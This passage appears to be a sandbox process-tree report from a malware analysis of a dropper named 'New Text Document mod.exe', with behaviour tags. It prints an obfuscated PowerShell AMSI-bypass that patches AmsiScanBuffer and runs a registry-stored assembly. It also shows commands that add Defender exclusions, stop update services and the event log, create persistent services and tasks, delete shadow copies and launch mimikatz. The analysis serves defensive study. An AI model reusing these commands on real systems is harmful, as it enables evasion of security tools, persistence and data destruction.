@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$QKHtrIBhUag=$bGAdRZPEzEzpP.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+'d'+'ll')));$TTzXZhzIGdgFaF=$SswDIYcTMvqjIl.Invoke($Null,@([Object]$QKHtrIBhUag,[Object]('L'+'o'+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+'ar'+'y'+''+[Char](65)+'')));$fVFApWLkwYvuABFok=$SswDIYcTMvqjIl.Invoke($Null,@([Object]$QKHtrIBhUag,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+'o'+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$xLRNSHS=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TTzXZhzIGdgFaF,$vGONupswNMwThwQvuKQ).Invoke('a'+[Char](109)+''+[Char](115)+'i.'+'d'+'ll');$LMQLfbsDcjBEhUcVY=$SswDIYcTMvqjIl.Invoke($Null,@([Object]$xLRNSHS,[Object](''+[Char](65)+'m'+[Char](115)+'i'+'S'+'c'+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'ff'+[Char](101)+''+[Char](114)+'')));$WQLImPBkIt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fVFApWLkwYvuABFok,$FzOFmFGZKOhPxAGlYTriDQ).Invoke($LMQLfbsDcjBEhUcVY,[uint32]8,4,[ref]$WQLImPBkIt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LMQLfbsDcjBEhUcVY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fVFApWLkwYvuABFok,$FzOFmFGZKOhPxAGlYTriDQ).Invoke($LMQLfbsDcjBEhUcVY,[uint32]8,0x20,[ref]$WQLImPBkIt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](76)+''+[Char](77)+''+[Char](88)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
PID:10576
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1404
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1436
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1468
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1552
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3008
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1672
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1812
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1820
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2d4 0x3dc2⤵PID:7512
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2d4 0x3dc2⤵PID:8524
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1940
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1948
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1960
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1200
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2340
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2568
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2636
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:3052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3176
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3356
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
PID:3436 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2876
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Quasar RAT
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {378003ed-3466-4c05-a7ed-bba5224629a8} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" gpu4⤵PID:5056
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2368 -parentBuildID 20240401114208 -prefsHandle 2360 -prefMapHandle 2356 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9c505050-1e03-46ef-b1ef-fe57c063421b} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" socket4⤵PID:4280
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 3312 -prefMapHandle 3236 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40e82d4d-daad-4ccc-aec4-2a84827a47b5} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:3428
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4300 -childID 2 -isForBrowser -prefsHandle 4232 -prefMapHandle 4264 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {232da120-c5f9-4710-8f76-18b72c86650e} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:5084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4948 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4940 -prefMapHandle 4936 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fd78a113-7969-4e5e-bce2-91af8e03e5e4} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" utility4⤵
- Checks processor information in registry
PID:2744
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 2816 -prefMapHandle 5344 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {698e29d7-fa9d-468e-ad62-559cb26849f6} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:2316
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5484 -childID 4 -isForBrowser -prefsHandle 5492 -prefMapHandle 5496 -prefsLen 27097 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bc065fc-d2b5-4c47-aadb-94561cb8278b} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:4204
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5736 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5664 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56e7f3f6-1aa9-404d-a43e-6f6e40ca12aa} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6216 -childID 6 -isForBrowser -prefsHandle 6252 -prefMapHandle 6136 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2344089e-5a12-4389-8f8c-266105fb3990} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:1756
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3768 -childID 7 -isForBrowser -prefsHandle 4552 -prefMapHandle 4708 -prefsLen 27228 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d145596-51cc-4398-902f-cc3f44578b51} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" tab4⤵PID:1120
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6024 -parentBuildID 20240401114208 -prefsHandle 3520 -prefMapHandle 6636 -prefsLen 32493 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0019d61-75fa-4047-aaf4-c6be63240aad} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" rdd4⤵PID:4000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6032 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 6648 -prefMapHandle 6620 -prefsLen 32493 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {393ca57c-3ce0-44e9-82ed-d36f7bd4573a} 4076 "\\.\pipe\gecko-crash-server-pipe.4076" utility4⤵
- Checks processor information in registry
PID:4228
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4636 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2436 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1900
-
-
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5204
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2024 -
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 7967⤵
- Program crash
PID:5700
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Users\Admin\Desktop\._cache_Synaptics.exe"C:\Users\Admin\Desktop\._cache_Synaptics.exe" InjUpdate6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5276 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5292
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2888 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:6096
-
-
C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4260 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:2732
-
-
-
-
C:\Users\Admin\Desktop\a\cbot.exe"C:\Users\Admin\Desktop\a\cbot.exe"7⤵PID:6452
-
-
C:\Users\Admin\Desktop\a\Client-built.exe"C:\Users\Admin\Desktop\a\Client-built.exe"7⤵PID:7224
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6008 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6080 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6092
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5448 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2732
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:384
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:3920
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:3992
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:4132
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:4516
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:4868
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
PID:3332
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
PID:5224
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
PID:5056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
PID:5740
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GeekBrains"5⤵
- Launches sc.exe
PID:4196
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"5⤵
- Launches sc.exe
PID:2692 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5628
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:5796 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:7116
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"5⤵
- Launches sc.exe
PID:6768 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:7124
-
-
-
-
C:\Users\Admin\Desktop\a\Crawl.exe"C:\Users\Admin\Desktop\a\Crawl.exe"4⤵PID:8124
-
\??\c:\Windows\system32\wbem\wmic.exec:\yNWnBf\yNWn\..\..\Windows\yNWn\yNWn\..\..\system32\yNWn\yNWn\..\..\wbem\yNWn\yNWnB\..\..\wmic.exe shadowcopy delete5⤵PID:8448
-
-
\??\c:\Windows\system32\wbem\wmic.exec:\fEpHls\fEpH\..\..\Windows\fEpH\fEpH\..\..\system32\fEpH\fEpH\..\..\wbem\fEpH\fEpHl\..\..\wmic.exe shadowcopy delete5⤵PID:4352
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\Desktop\a\Crawl.exe"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4264
-
-
-
C:\Users\Admin\Desktop\a\albt.exe"C:\Users\Admin\Desktop\a\albt.exe"4⤵PID:8500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8500 -s 11925⤵
- Program crash
PID:8892
-
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:4364
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5244 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 27673 -prefMapSize 244985 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8edcf035-0c2d-40e3-9631-2a3ba0f76db7} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" gpu4⤵PID:4616
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2368 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2344 -prefsLen 27709 -prefMapSize 244985 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {def19975-458b-4368-b84f-3fe7f26f6503} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" socket4⤵PID:3676
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3160 -childID 1 -isForBrowser -prefsHandle 2536 -prefMapHandle 3184 -prefsLen 27850 -prefMapSize 244985 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d4ff065-bee5-41c6-bd71-c5bcab1ee116} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" tab4⤵PID:1844
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 4108 -prefsLen 33026 -prefMapSize 244985 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56fad163-dd47-4370-9ce8-0acbefabc995} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" tab4⤵PID:2324
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4796 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4792 -prefMapHandle 4788 -prefsLen 33080 -prefMapSize 244985 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3a065e0f-a201-4aeb-8b2d-ad995d0f7ad9} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" utility4⤵
- Checks processor information in registry
PID:2936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -childID 3 -isForBrowser -prefsHandle 4976 -prefMapHandle 4972 -prefsLen 27506 -prefMapSize 244985 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {599f57c9-b689-45d2-b878-59e83f7892a0} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" tab4⤵PID:4408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5908 -childID 4 -isForBrowser -prefsHandle 5816 -prefMapHandle 5736 -prefsLen 27506 -prefMapSize 244985 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {992a173d-da5f-4c31-a725-2c9cd964f9a2} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" tab4⤵PID:3988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6060 -childID 5 -isForBrowser -prefsHandle 6072 -prefMapHandle 5820 -prefsLen 27506 -prefMapSize 244985 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d42e5384-78dc-4841-ab0d-1461ff38b489} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" tab4⤵PID:5768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6240 -childID 6 -isForBrowser -prefsHandle 6248 -prefMapHandle 6252 -prefsLen 27506 -prefMapSize 244985 -jsInitHandle 1268 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4fdc6fdb-3d6e-44bf-9768-672cca1ae9d4} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" tab4⤵PID:5776
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6300 -parentBuildID 20240401114208 -prefsHandle 6308 -prefMapHandle 6456 -prefsLen 33080 -prefMapSize 244985 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8cc52d55-3514-489b-a028-d53991e92fc4} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" rdd4⤵PID:5084
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6440 -parentBuildID 20240401114208 -sandboxingKind 1 -prefsHandle 5816 -prefMapHandle 6452 -prefsLen 33080 -prefMapSize 244985 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0185877-4e89-4c44-9c15-9979d06c73bb} 5244 "\\.\pipe\gecko-crash-server-pipe.5244" utility4⤵
- Checks processor information in registry
PID:4240
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵PID:816
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵PID:7124
-
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6924
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:2304
-
C:\Users\Admin\Desktop\a\mimikatz.exe"C:\Users\Admin\Desktop\a\mimikatz.exe"4⤵PID:2888
-
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:6868
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:5796
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"2⤵PID:7068
-
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"3⤵PID:6332
-
C:\Users\Admin\Desktop\a\uu.exe"C:\Users\Admin\Desktop\a\uu.exe"4⤵PID:7868
-
-
C:\Users\Admin\Desktop\a\sela.exe"C:\Users\Admin\Desktop\a\sela.exe"4⤵PID:7916
-
-
C:\Users\Admin\Desktop\a\evetbeta.exe"C:\Users\Admin\Desktop\a\evetbeta.exe"4⤵PID:9532
-
-
